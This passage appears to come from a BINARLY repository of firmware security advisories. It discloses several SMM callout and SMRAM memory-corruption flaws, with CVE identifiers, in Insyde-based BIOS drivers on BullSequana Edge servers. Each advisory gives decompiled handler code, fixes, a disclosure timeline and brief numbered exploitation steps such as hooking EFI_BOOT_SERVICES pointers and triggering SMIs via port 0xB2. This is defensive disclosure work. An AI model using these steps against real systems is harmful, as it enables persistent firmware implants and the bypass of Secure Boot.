[BIOS_SKD080.18.02.003.sign.tar.gz](https://support.bull.com/ols/product/platforms/bullion/bullsequana-edge-servers/dl/pkgf/g/firmware-of-technical-state-016.02/bios-skd080-rev-80-18-02-build-003/view) | Int15ServiceSmm | 08ADB25DDCFC2111CC0AD0D1C9F1D3FA0CB2BFD1EE88AAD0487CFBF5BFB6F3C3 | 7D4E94A9-269A-47A1-80F0-2B0EB42F7B4B | 21 | 22 | ## Potential impact 23 | 24 | An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into the BIOS. Such a malicious firmware code in the BIOS could persist across operating system re-installs. Additionally, this vulnerability could potentially be used by threat actors to bypass security mechanisms provided by the UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). 25 | 26 | ## Vulnerability description 27 | 28 | The vulnerability exists in the SW SMI handler registered with number `0xF9` and located at offset `0x06F0` in the driver: 29 | 30 | ```C++ 31 | EFI_STATUS SwSmiHandler(EFI_HANDLE DispatchHandle, const void *Context, void *CommBuffer, UINTN *CommBufferSize) 32 | { 33 | if ( !*((_WORD *)gSmmBuffer + 3) ) 34 | return sub_80000D18(); 35 | ... 36 | ``` 37 | 38 | As we can see, depending on the contents of a buffer allocated in SMRAM pointed by `gSmmBuffer`, a routine `sub_80000D18()` is invoked that dereferences `EFI_BOOT_SERVICES` pointer to call `LocateProtocol()`: 39 | 40 | ```C++ 41 | __int64 sub_80000D18() 42 | { 43 | gEfiBootServices->LocateProtocol(&EFI_SMM_RUNTIME_PROTOCOL_GUID, 0, &EfiSmmRuntimeProtocol); 44 | 45 | if ((gEfiBootServices->LocateProtocol(&UNKNOWN_PROTOCOL_3D819F77_GUID, 0, &UnknownProtocol3d819f77) & 0x8000000000000000) == 0) 46 | { 47 | *(_QWORD *)(0x10 * *((unsigned __int16 *)UnknownProtocol3d819f77 + 1) + 0x32) = sub_80001104; 48 | *(_DWORD *)gSmmBuffer = 'S51I'; 49 | *((_WORD *)gSmmBuffer + 2) = *(_WORD *)UnknownProtocol3d819f77; 50 | *((_WORD *)gSmmBuffer + 3) = *((_WORD *)UnknownProtocol3d819f77 + 1); 51 | *((_QWORD *)gSmmBuffer + 2) = sub_80000B2C; 52 | *((_QWORD *)gSmmBuffer + 3) = sub_80001040; 53 | 54 | ... 55 | ``` 56 | 57 | It is worth mentioning that `sub_80000D18()` is also called from the initialization procedure in this driver just after the allocation of `gSmmBuffer`. The value in `*((_WORD *)gSmmBuffer + 3)` will be initialized with a value taken from `3d819f77-ad7d-407d-8d44-e7a61f0cb49c` protocol. However this value could be `0` which allows the execution of the `sub_80000D18()` function in the SW SMI handler. 58 | 59 | In any case, the usage of `EFI_BOOT_SERVICES` and `EFI_RUNTIME_SERVICES` is unsafe inside a code intended to run in the SMM (from SMRAM), especially in SMI handlers, because an attacker capable of executing code in DXE phase could exploit this vulnerability to escalate privileges to SMM (ring -2). 60 | 61 | To exploit this vulnerability it is enough to: 62 | 63 | 1. Find `EFI_BOOT_SERVICES` table in system memory. 64 | 2. Overwrite `LocateProtocol()` service pointer in it with the shellcode address. 65 | 3. Trigger the SW SMI handler `0xF9` via `0xB2` IO port. 66 | 67 | To fix this vulnerability, it is essential that usage of `EFI_BOOT_SERVICES` is minimised only to SMM driver's early initialization routine. 68 | 69 | ## Disclosure timeline 70 | 71 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 72 | 73 | | Disclosure Activity | Date | 74 | | ------------------------------------- | -------------- | 75 | | CERT/CC created a case | 2021-09-27 | 76 | | Insyde PSIRT confirmed issue | 2021-09-29 | 77 | | Insyde PSIRT assigned CVE number | 2021-11-07 | 78 | | Insyde PSIRT provide patch release | 2021-11-09 | 79 | | BINARLY public disclosure date | 2022-02-01 | 80 | 81 | ## Acknowledgements 82 | 83 | **BINARLY efiXplorer team** 84 | -------------------------------------------------------------------------------- /Insyde/BRLY-2021-024.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2021-024] 2 | 3 | # SMM memory corruption vulnerability in combined DXE/SMM driver on BullSequana Edge server. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a SMM memory corruption vulnerability on a BullSequana Edge server allowing a possible attacker to write fixed or predictable data to SMRAM. Exploiting this issue could lead to escalating privileges to SMM. 8 | 9 | ## Vulanerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2021-024 12 | * CERT/CC assigned case number: [VU#796611](https://kb.cert.org/vuls/id/796611) 13 | * Insyde PSIRT assigned CVE identifier: [CVE-2021-43522](https://www.insyde.com/security-pledge/SA-2022009) 14 | * CVSS v3.1: 7.5 High AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H 15 | 16 | ## Affected BullSequana Edge servers firmware with confirmed impact by BINARLY team 17 | 18 | | Package | File Name | SHA256 (File PE32 section) | File GUID | 19 | | --- | --- | --- | --- | 20 | | [BIOS_SKD080.18.02.003.sign.tar.gz](https://support.bull.com/ols/product/platforms/bullion/bullsequana-edge-servers/dl/pkgf/g/firmware-of-technical-state-016.02/bios-skd080-rev-80-18-02-build-003/view) | StorageSecurityCommandDxe | A41A4C78197F7C1CE62A4C94E9EEB1119A1005E9F049CD086C2F8B52D7406394 | 70D57D67-7F05-494D-A014-B75D7345B700 | 21 | 22 | ## Potential impact 23 | 24 | An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into the BIOS. Such a malicious firmware code in the BIOS could persist across operating system re-installs. Additionally, this vulnerability could potentially be used by threat actors to bypass security mechanisms provided by the UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). 25 | 26 | ## Vulnerabilities description 27 | 28 | The vulnerability exists in the child SW SMI handler registered with the GUID `1d3de7f0-0807-424f-aa69-11a54e19a46f` and located at offset `0x1E0C` in the driver: 29 | 30 | ```C++ 31 | EFI_STATUS SmiHandler(EFI_HANDLE DispatchHandle, const void *Context, void *CommBuffer, UINTN *CommBufferSize) 32 | { 33 | if ( CommBuffer && CommBufferSize ) 34 | { 35 | if ( *(_QWORD *)CommBuffer == 1 ) 36 | { 37 | ... 38 | } 39 | if ( *(_QWORD *)CommBuffer == 2 ) 40 | { 41 | ... 42 | } 43 | else 44 | { 45 | Status = 0x8000000000000003; 46 | } 47 | 48 | CommBuffer[1] = Status; 49 | } 50 | 51 | return EFI_SUCCESS; 52 | } 53 | ``` 54 | 55 | As we can see, input Communication Buffer is not validated to be outside of SMRAM since the Communication Buffer size (`*CommBufferSize`) is not checked to be valid (not `0` or equal to any fixed expectable value) for relying on the validation implemented in `PiSmmCommunicationSmm` module (based on a Communication Header). 56 | 57 | Keeping this in mind, a possible attacker has limited but still an opportunity to corrupt some SMM memory by pointing this buffer into SMRAM contents. This leads to rewriting pointed area with a fixed or predictable data - Status code. Writing such data into SMRAM could allow a possible attacker to corrupt some structures in the beginning of this memory (for example, change SMM S3 resume code pointer and hijack execution flow during SMM S3 wake up procedure). This could lead to gaining arbitrary code execution in SMM. 58 | 59 | To exploit this vulnerability it is enough to: 60 | 61 | 1. Set up a Communication Buffer (only a Communication Header with MessageSize = 0) just before SMRAM (`SMRAM_BASE - sizeof(EFI_SMM_COMMUNICATE_HEADER)`). 62 | 2. Trigger the SW SMI Handler (SW SMI number and pointer to Communication Buffer are specified in UEFI ACPI table) via `0xB2` IO port. 63 | 64 | To fix this vulnerability, it is essential that all input pointers (including nested pointers) for SMI handlers are wrapped with sanity checks to make sure they are not pointing into SMRAM. 65 | 66 | ## Disclosure timeline 67 | 68 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 69 | 70 | | Disclosure Activity | Date | 71 | | ------------------------------------- | -------------- | 72 | | CERT/CC created a case | 2021-09-27 | 73 | | Insyde PSIRT confirmed issue | 2021-09-29 | 74 | | Insyde PSIRT assigned CVE number | 2021-11-03 | 75 | | Insyde PSIRT provide patch release | 2021-11-09 | 76 | | BINARLY public disclosure date | 2022-02-01 | 77 | 78 | ## Acknowledgements 79 | 80 | **BINARLY efiXplorer team** 81 | -------------------------------------------------------------------------------- /Insyde/BRLY-2021-025.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2021-025] 2 | 3 | # SMM callout vulnerability in combined DXE/SMM driver on BullSequana Edge server. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a SMM callout vulnerability on a BullSequana Edge server allowing a possible attacker to hijack execution flow of a code running in System Management Mode. Exploiting this issue could lead to escalating privileges to SMM. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2021-025 12 | * CERT/CC assigned case number: [VU#796611](https://kb.cert.org/vuls/id/796611) 13 | * Insyde PSIRT assigned CVE identifier: [CVE-2022-24069](https://www.insyde.com/security-pledge/SA-2022010) 14 | * CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 15 | 16 | ## Affected BullSequana Edge server firmware with confirmed impact by BINARLY team 17 | 18 | | Package | File Name | SHA256 (File PE32 section) | File GUID | 19 | | --- | --- | --- | --- | 20 | | [BIOS_SKD080.18.02.003.sign.tar.gz](https://support.bull.com/ols/product/platforms/bullion/bullsequana-edge-servers/dl/pkgf/g/firmware-of-technical-state-016.02/bios-skd080-rev-80-18-02-build-003/view) | AhciBusDxe | B53316361C54660956F1D8D0FBD16F4B645657A3B6E83AEA7602C8981140F585 | 3ACC966D-8E33-45C6-B4FE-62724BCD15A9 | 21 | 22 | ## Potential impact 23 | 24 | An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into the BIOS. Such a malicious firmware code in the BIOS could persist across operating system re-installs. Additionally, this vulnerability could potentially be used by threat actors to bypass security mechanisms provided by the UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). 25 | 26 | ## Vulnerability description 27 | 28 | The vulnerability exists in the child SW SMI handler registered with the GUID `56947330-585c-4470-a95d-c55c529feb47` and located at offset `0x1328` in the driver: 29 | 30 | ```C++ 31 | EFI_STATUS SmiHandler(EFI_HANDLE DispatchHandle, const void *Context, void *CommBuffer, UINTN *CommBufferSize) 32 | { 33 | if ( CommBuffer && CommBufferSize ) 34 | { 35 | if ( *(_QWORD *)CommBuffer == 1 ) 36 | { 37 | v11 = 0; 38 | if ( gEfiBootServices->LocateHandleBuffer)(2, &EFI_ATA_PASS_THRU_PROTOCOL_GUID, 0, &v13, &v11) ) 39 | ... 40 | ``` 41 | 42 | As we can see, in case `1` is passed in the first `QWORD` inside a Communication Buffer, `EFI_BOOT_SERVICES` pointer will be dereferenced to call `LocateHandleBuffer()`. 43 | 44 | Usage of `EFI_BOOT_SERVICES` and `EFI_RUNTIME_SERVICES` is unsafe inside a code intended to run in SMM (from SMRAM), especially in SMI handlers, because a possible attacker with a R/W access to system memory could hook pointers in these tables to escalate privileges to SMM (ring -2). 45 | 46 | To exploit this vulnerability it is enough to: 47 | 48 | 1. Find `EFI_BOOT_SERVICES` table in system memory. 49 | 2. Overwrite `LocateHandleBuffer()` service pointer in it with the shellcode address. 50 | 3. Set up the first `QWORD` of a Communication Buffer with a value of `1`. 51 | 4. Trigger the SW SMI Handler (SW SMI number and pointer to Communication Buffer are specified in UEFI ACPI table) via `0xB2` IO port. 52 | 53 | To fix this vulnerability, it is essential that the usage of the `EFI_BOOT_SERVICES` is minimised only to SMM driver's early initialization routine. 54 | 55 | ## Disclosure timeline 56 | 57 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 58 | 59 | | Disclosure Activity | Date | 60 | | ------------------------------------- | -------------- | 61 | | CERT/CC created a case | 2021-09-27 | 62 | | Insyde PSIRT confirmed issue | 2021-09-29 | 63 | | Insyde PSIRT assigned CVE number | 2021-11-03 | 64 | | Insyde PSIRT provide patch release | 2021-11-09 | 65 | | BINARLY public disclosure date | 2022-02-01 | 66 | 67 | ## Acknowledgements 68 | 69 | **BINARLY efiXplorer team** 70 | -------------------------------------------------------------------------------- /Insyde/BRLY-2021-026.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2021-026] 2 | 3 | # SMM memory corruption vulnerability in combined DXE/SMM driver on BullSequana Edge server. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a SMM memory corruption vulnerability on a BullSequana Edge server allowing a possible attacker to write fixed or predictable data to SMRAM. Exploiting this issue could lead to escalating privileges to SMM. 8 | 9 | ## Vulanerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2021-026 12 | * CERT/CC assigned case number: [VU#796611](https://kb.cert.org/vuls/id/796611) 13 | * Insyde PSIRT assigned CVE identifier: [CVE-2022-24030](https://www.insyde.com/security-pledge/SA-2022011) 14 | * CVSS v3.1: 7.5 High AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H 15 | 16 | ## Affected BullSequana Edge server firmware with confirmed impact by BINARLY team 17 | 18 | | Package | File Name | SHA256 (File PE32 section) | File GUID | 19 | | --- | --- | --- | --- | 20 | | [BIOS_SKD080.18.02.003.sign.tar.gz](https://support.bull.com/ols/product/platforms/bullion/bullsequana-edge-servers/dl/pkgf/g/firmware-of-technical-state-016.02/bios-skd080-rev-80-18-02-build-003/view) | AhciBusDxe | B53316361C54660956F1D8D0FBD16F4B645657A3B6E83AEA7602C8981140F585 | 3ACC966D-8E33-45C6-B4FE-62724BCD15A9 | 21 | 22 | ## Potential impact 23 | 24 | An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into the BIOS. Such a malicious firmware code in the BIOS could persist across operating system re-installs. Additionally, this vulnerability could potentially be used by threat actors to bypass security mechanisms provided by the UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). 25 | 26 | ## Vulnerabilities description 27 | 28 | The vulnerability exists in the child SW SMI handler registered with the GUID `56947330-585c-4470-a95d-c55c529feb47` and located at offset `0x1328` in the driver: 29 | 30 | ```C++ 31 | EFI_STATUS SmiHandler(EFI_HANDLE DispatchHandle, const void *Context, void *CommBuffer, UINTN *CommBufferSize) 32 | { 33 | if ( CommBuffer && CommBufferSize ) 34 | { 35 | if ( *(_QWORD *)CommBuffer == 1 ) 36 | { 37 | ... 38 | } 39 | if ( *(_QWORD *)CommBuffer == 2 ) 40 | { 41 | ... 42 | } 43 | else 44 | { 45 | Status = 0x8000000000000003; 46 | } 47 | 48 | CommBuffer[1] = Status; 49 | } 50 | 51 | return EFI_SUCCESS; 52 | } 53 | ``` 54 | 55 | As we can see, the input Communication Buffer is not validated to be outside of SMRAM since the Communication Buffer size (`*CommBufferSize`) is not checked to be valid (not `0` or equal to any fixed expectable value) for relying on the validation implemented in `PiSmmCommunicationSmm` module (based on a Communication Header). 56 | 57 | Keeping this in mind, a possible attacker has limited but still an opportunity to corrupt some SMM memory by pointing this buffer into SMRAM contents. This leads to rewriting pointed area with a fixed or predictable data - Status code. Writing such data into SMRAM could allow a possible attacker to corrupt some structures in the beginning of this memory (for example, change SMM S3 resume code pointer and hijack execution flow during SMM S3 wake up procedure). This could lead to gaining arbitrary code execution in SMM. 58 | 59 | To exploit this vulnerability it is enough to: 60 | 61 | 1. Set up a Communication Buffer (only a Communication Header with MessageSize = 0) just before SMRAM (`SMRAM_BASE - sizeof(EFI_SMM_COMMUNICATE_HEADER)`). 62 | 2. Trigger the SW SMI Handler (SW SMI number and pointer to Communication Buffer are specified in UEFI ACPI table) via `0xB2` IO port. 63 | 64 | To fix this vulnerability, it is essential that all the input pointers (including the nested pointers) for the SMI handlers are wrapped with sanity checks to make sure they are not pointing into SMRAM. 65 | 66 | ## Disclosure timeline 67 | 68 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 69 | 70 | | Disclosure Activity | Date | 71 | | ------------------------------------- | -------------- | 72 | | CERT/CC created a case | 2021-09-27 | 73 | | Insyde PSIRT confirmed issue | 2021-09-29 | 74 | | Insyde PSIRT assigned CVE number | 2021-11-03 | 75 | | Insyde PSIRT provide patch release | 2021-11-09 | 76 | | BINARLY public disclosure date | 2022-02-01 | 77 | 78 | ## Acknowledgements 79 | 80 | **BINARLY efiXplorer team** 81 | -------------------------------------------------------------------------------- /Insyde/BRLY-2021-028.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2021-028] 2 | 3 | # SMM callout vulnerability in combined DXE/SMM driver on BullSequana Edge server. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a SMM callout vulnerability on a BullSequana Edge server allowing a possible attacker to hijack execution flow of a code running in System Management Mode. Exploiting this issue could lead to escalating privileges to SMM. 8 | 9 | ## Vulnerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2021-028 12 | * CERT/CC assigned case number: [VU#796611](https://kb.cert.org/vuls/id/796611) 13 | * Insyde PSIRT assigned CVE identifier: [CVE-2021-43615](https://www.insyde.com/security-pledge/SA-2022013) 14 | * CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H 15 | 16 | ## Affected BullSequana Edge servers firmware with confirmed impact by BINARLY team 17 | 18 | | Package | File Name | SHA256 (File PE32 section) | File GUID | 19 | | --- | --- | --- | --- | 20 | | [BIOS_SKD080.18.02.003.sign.tar.gz](https://support.bull.com/ols/product/platforms/bullion/bullsequana-edge-servers/dl/pkgf/g/firmware-of-technical-state-016.02/bios-skd080-rev-80-18-02-build-003/view) | HddPassword | 1753665EA4300109A9CD9D36C1D370D3BAEDB1F055A3A3E8EBD8CF2F5E715EC9 | E8571188-00C1-4ED4-B14E-E38451351EC4 | 21 | 22 | ## Potential impact 23 | 24 | An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into the BIOS. Such a malicious firmware code in the BIOS could persist across operating system re-installs. Additionally, this vulnerability could potentially be used by threat actors to bypass security mechanisms provided by the UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). 25 | 26 | ## Vulnerability description 27 | 28 | The vulnerability exists in the SW SMI handler registered with the GUID `9c28be0c-ee32-43d8-a223-e7c1614ef7ca` and located at offset `0x23B0` in the driver: 29 | 30 | ```C++ 31 | EFI_STATUS SmiHandler(EFI_HANDLE DispatchHandle, const void *Context, void *CommBuffer, UINTN *CommBufferSize) 32 | { 33 | if ( CommBuffer && CommBufferSize ) 34 | { 35 | if ( *(_QWORD *)CommBuffer != 1 ) 36 | { 37 | if ( *(_QWORD *)CommBuffer == 2 ) 38 | { 39 | ... 40 | } 41 | if ( *(_QWORD *)CommBuffer != 3 ) 42 | goto LABEL_43; 43 | } 44 | v5 = gEfiBootServices->LocateProtocol)(&UNKNOWN_PROTOCOL_9C28BE0C_GUID, 0, &v16); 45 | ... 46 | ``` 47 | 48 | As we can see, in case `1` or `3` is passed in the first `QWORD` inside a Communication Buffer, `EFI_BOOT_SERVICES` pointer is dereferenced to call `LocateProtocol()`. 49 | 50 | Usage of the `EFI_BOOT_SERVICES` and `EFI_RUNTIME_SERVICES` is unsafe inside a code intended to run in SMM (from SMRAM), especially in SMI handlers, because a possible attacker with a R/W access to system memory could hook pointers in these tables to escalate privileges to SMM (ring -2). 51 | 52 | To exploit this vulnerability it is enough to: 53 | 54 | 1. Find `EFI_BOOT_SERVICES` table in system memory. 55 | 2. Overwrite `LocateProtocol()` service pointer in it with the shellcode address. 56 | 3. Set up the first `QWORD` inside a Communication Buffer with a value of either `1` or `3`. 57 | 4. Trigger the SW SMI Handler (SW SMI number and pointer to Communication Buffer are specified in UEFI ACPI table) via `0xB2` IO port. 58 | 59 | To fix this vulnerability, it is essential that the usage of `EFI_BOOT_SERVICES` is minimised only to SMM driver's early initialization routine. 60 | 61 | ## Disclosure timeline 62 | 63 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 64 | 65 | | Disclosure Activity | Date | 66 | | ------------------------------------- | -------------- | 67 | | CERT/CC created a case | 2021-09-27 | 68 | | Insyde PSIRT confirmed issue | 2021-09-29 | 69 | | Insyde PSIRT assigned CVE number | 2021-11-13 | 70 | | Insyde PSIRT provide patch release | 2021-11-19 | 71 | | BINARLY public disclosure date | 2022-02-01 | 72 | 73 | ## Acknowledgements 74 | 75 | **BINARLY efiXplorer team** 76 | -------------------------------------------------------------------------------- /Insyde/BRLY-2021-029.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2021-029] 2 | 3 | # SMM memory corruption vulnerability in combined DXE/SMM driver on BullSequana Edge server. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a SMM memory corruption vulnerability on a BullSequana Edge server allowing a possible attacker to write fixed or predictable data to SMRAM. Exploiting this issue could lead to escalating privileges to SMM. 8 | 9 | ## Vulanerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2021-029 12 | * CERT/CC assigned case number: [VU#796611](https://kb.cert.org/vuls/id/796611) 13 | * Insyde PSIRT assigned CVE identifier: [CVE-2021-33625](https://www.insyde.com/security-pledge/SA-2022014) 14 | * CVSS v3.1: 7.5 High AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H 15 | 16 | ## Affected BullSequana Edge server firmware with confirmed impact by BINARLY team 17 | 18 | | Package | File Name | SHA256 (File PE32 section) | File GUID | 19 | | --- | --- | --- | --- | 20 | | [BIOS_SKD080.18.02.003.sign.tar.gz](https://support.bull.com/ols/product/platforms/bullion/bullsequana-edge-servers/dl/pkgf/g/firmware-of-technical-state-016.02/bios-skd080-rev-80-18-02-build-003/view) | HddPassword | 1753665EA4300109A9CD9D36C1D370D3BAEDB1F055A3A3E8EBD8CF2F5E715EC9 | E8571188-00C1-4ED4-B14E-E38451351EC4 | 21 | 22 | ## Potential impact 23 | 24 | An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into the BIOS. Such a malicious firmware code in the BIOS could persist across operating system re-installs. Additionally, this vulnerability could potentially be used by threat actors to bypass security mechanisms provided by the UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). 25 | 26 | ## Vulnerabilities description 27 | 28 | The vulnerability exists in the SW SMI handler registered with the GUID `9c28be0c-ee32-43d8-a223-e7c1614ef7ca` and located at offset `0x23B0` in the driver: 29 | 30 | ```C++ 31 | EFI_STATUS SmiHandler(EFI_HANDLE DispatchHandle, const void *Context, void *CommBuffer, UINTN *CommBufferSize) 32 | { 33 | if ( CommBuffer && CommBufferSize ) 34 | { 35 | if ( *(_QWORD *)CommBuffer != 1 ) 36 | { 37 | if ( *(_QWORD *)CommBuffer == 2 ) 38 | { 39 | ... 40 | } 41 | if ( *(_QWORD *)CommBuffer != 3i64 ) 42 | goto LABEL_43; 43 | } 44 | 45 | ... 46 | 47 | CommBuffer[1] = Status; 48 | } 49 | 50 | return EFI_SUCCESS; 51 | } 52 | ``` 53 | 54 | As we can see, the input Communication Buffer is not validated to be outside of SMRAM since the Communication Buffer size (`*CommBufferSize`) is not checked to be valid (not `0` or equal to any fixed expectable value) for relying on the validation implemented in `PiSmmCommunicationSmm` module (based on a Communication Header). 55 | 56 | Keeping this in mind, a possible attacker has limited but still an opportunity to corrupt some SMM memory by pointing this buffer into SMRAM contents. This leads to rewriting pointed area with a fixed or predictable data - Status code. Writing such data into SMRAM could allow a possible attacker to corrupt some structures in the beginning of this memory (for example, change SMM S3 resume code pointer and hijack execution flow during SMM S3 wake up procedure). This could lead to gaining arbitrary code execution in SMM. 57 | 58 | To exploit this vulnerability it is enough to: 59 | 60 | 1. Set up a Communication Buffer (only a Communication Header with MessageSize = 0) just before SMRAM (`SMRAM_BASE - sizeof(EFI_SMM_COMMUNICATE_HEADER)`). 61 | 2. Trigger the SW SMI Handler (SW SMI number and pointer to Communication Buffer are specified in UEFI ACPI table) via `0xB2` IO port. 62 | 63 | To fix this vulnerability, it is essential that all the input pointers (including the nested pointers) for SMI handlers are wrapped with sanity checks to make sure they are not pointing into SMRAM. 64 | 65 | ## Disclosure timeline 66 | 67 | This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. 68 | 69 | | Disclosure Activity | Date | 70 | | ------------------------------------- | -------------- | 71 | | CERT/CC created a case | 2021-09-27 | 72 | | Insyde PSIRT confirmed issue | 2021-09-29 | 73 | | Insyde PSIRT assigned CVE number | 2021-11-07 | 74 | | Insyde PSIRT provide patch release | 2021-11-09 | 75 | | BINARLY public disclosure date | 2022-02-01 | 76 | 77 | ## Acknowledgements 78 | 79 | **BINARLY efiXplorer team** 80 | -------------------------------------------------------------------------------- /Insyde/BRLY-2021-030.md: -------------------------------------------------------------------------------- 1 | # [BRLY-2021-030] 2 | 3 | # SMM memory corruption vulnerability in combined DXE/SMM driver on BullSequana Edge server. 4 | 5 | ## Summary 6 | 7 | **BINARLY efiXplorer team** has discovered a SMM memory corruption vulnerability on a BullSequana Edge server allowing a possible attacker to write fixed or predictable data to SMRAM. Exploiting this issue could lead to escalating privileges to SMM. 8 | 9 | ## Vulanerability Information 10 | 11 | * BINARLY internal vulnerability identifier: BRLY-2021-030 12 | * CERT/CC assigned case number: [VU#796611](https://kb.cert.org/vuls/id/796611) 13 | * Insyde PSIRT assigned CVE identifier: [CVE-2022-24031](https://www.insyde.com/security-pledge/SA-2022015) 14 | * CVSS v3.1: 7.5 High AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H 15 | 16 | ## Affected BullSequana Edge server firmware with confirmed impact by BINARLY team 17 | 18 | | Package | File Name | SHA256 (File PE32 section) | File GUID | 19 | | --- | --- | --- | --- | 20 | | [BIOS_SKD080.18.02.003.sign.tar.gz](https://support.bull.com/ols/product/platforms/bullion/bullsequana-edge-servers/dl/pkgf/g/firmware-of-technical-state-016.02/bios-skd080-rev-80-18-02-build-003/view) | NvmExpressDxe | 156AD478C9F662583A8DF707E765347E8BEA8EB443E0766E4B6AD71CB6007435 | 5BE3BDF4-53CF-46A3-A6A9-73C34A6E5EE3 | 21 | 22 | ## Potential impact 23 | 24 | An attacker can exploit this vulnerability to elevate privileges from ring 0 to ring -2, execute arbitrary code in System Management Mode - an environment more privileged than operating system (OS) and completely isolated from it. Running arbitrary code in SMM additionally bypasses SMM-based SPI flash protections against modifications, which can help an attacker to install a firmware backdoor/implant into the BIOS. Such a malicious firmware code in the BIOS could persist across operating system re-installs. Additionally, this vulnerability could potentially be used by threat actors to bypass security mechanisms provided by the UEFI firmware (for example, Secure Boot and some types of memory isolation for hypervisors). 25 | 26 | ## Vulnerabilities description 27 | 28 | The vulnerability exists in the SW SMI handler registered with the GUID `52c78312-8edc-4233-98f2-1a1aa5e388a5` and located at offset `0x2090` in the driver: 29 | 30 | ```C++ 31 | EFI_STATUS SmiHandler(EFI_HANDLE DispatchHandle, const void *Context, void *CommBuffer, UINTN *CommBufferSize) 32 | { 33 | if ( gUnknownProtocol != CommBuffer || *CommBufferSize != 0x20 || !CommBuffer ) 34 | return 0; 35 | if ( *(_QWORD *)CommBuffer != 1 ) 36 | { 37 | if ( *(_QWORD *)CommBuffer != 2 ) 38 | return 0x8000000000000003; 39 | 40 | ... 41 | 42 | return 0; 43 | } 44 | 45 | gPointer = *((_QWORD *)CommBuffer + 2); 46 | result = sub_800014C0(DispatchHandle, Context); 47 | ... 48 | } 49 | ``` 50 | 51 | As we can see in case `1` is passed in the first `QWORD` inside a Communication Buffer, a pointer is extracted from it and saved to `gPointer`, then `sub_800014C0()` is invoked, where the following code is executed: 52 | 53 | ```C++ 54 | for ( i = Deref(gPointer); ; i = Deref2(gPointer, v1) ) 55 | { 56 | v1 = i; 57 | if ( CompareValues(gPointer, i) ) 58 | break; 59 | v2 = *(_QWORD *)(v1 - 0x10); 60 | if ( !*(_BYTE *)(v1 - 8) ) 61 | { 62 | if ( *(_BYTE *)(*(_QWORD *)(v2 + 0xB0) + 0x100) & 1 ) 63 | { 64 | *(_QWORD *)(v1 - 0xD0) = sub_800041E8; 65 | *(_QWORD *)(v1 - 0xC8) = sub_800044E8; 66 | ``` 67 | 68 | Several write operations with fixed values are performed into a memory relatively pointed by `gPointer`. The problem is that the nested pointer (saved into `gPointer)` inside Communication Buffer is not validated to be outside of SMRAM. 69 | 70 | This leads to overwriting the pointed area with a fixed or predictable data - functions pointers. Writing such data into SMRAM could allow a possible attacker to modify SMM code or to corrupt some data in SMRAM. This could lead to gaining arbitrary code execution in SMM. 71 | 72 | To exploit this vulnerability it is enough to: 73 | 74 | 1. Set up a Communication Buffer to point to a desired location in SMRAM to modify (`*((_QWORD *)CommBuffer + 2)`). 75 | 